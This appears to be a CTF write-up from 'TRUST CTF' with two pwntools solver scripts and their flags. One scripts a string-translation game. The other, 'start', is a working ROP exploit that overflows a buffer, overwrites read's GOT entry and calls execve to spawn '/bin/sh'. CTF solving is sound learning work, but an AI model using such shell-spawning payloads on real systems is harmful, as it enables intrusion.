TRUST CTF

Easy Taebo

from pwn import *

c = remote('server.trustctf.com', 44923)

for i in range(1, 101):
    tmp = ""
    str = []

    c.recvuntil("Taebo %s : " %i)
    str = c.recvline().replace("left_jab", "@==(^0^)@", 5).replace("left_mid_jab", "@=(^0^)@", 5).replace("right_mid_jab", "@(^0^)=@", 5).replace("mid_jab", "@(^0^)@", 5).replace("right_jab", "@(^0^)==@", 5).replace("left_hook", "@(^0^)@==", 5).replace("right_hook", "==@(^0^)@", 5).replace("left_speedball", "@@@(^0^)", 5).replace("right_speedball", "(^0^)@@@", 5).replace("left_kick", "@||(^0^)==@", 5).replace("mid_kick", "@==(^||^)==@", 5).replace("right_kick", "@==(^0^)||@", 5).replace(" >> \n", "", 1).split(' + ')

    print("level%s" %i)
    print(str)
    j = len(str)
    print(j)

    for p in range(j):
        tmp = tmp + str[p] + ' '

    c.send(tmp + '\n')

c.interactive()

TRUST{w0w_y0u_9o7_4_w0nd3rfu1_b0dy_lik3_m3}

start

from pwn import *
#r = remote('server.trustctf.com', 10392)
r = process('./start')
e = ELF('./start')
pr = 0x4005ed # pop rsi
ppppr = 0x4005ea # pop rax,rdx,rdi,rsi
cmd = "/bin/sh\x00"
syscall = "\x7b"

payload = ""
payload += "A"*24
payload += p64(pr)
payload += p64(e.bss())
payload += p64(e.plt['read'])

payload += p64(pr)
payload += p64(e.got['read'])
payload += p64(e.plt['read'])

payload += p64(ppppr)
payload += p64(59)
payload += p64(0)
payload += p64(e.bss())
payload += p64(0)
payload += p64(e.plt['read'])
payload += cmd

r.sendline(payload)
r.send(syscall)
r.interactive()

TRUST{7h3_e4sie5t_t4sk_in_TRUST_CTF}

​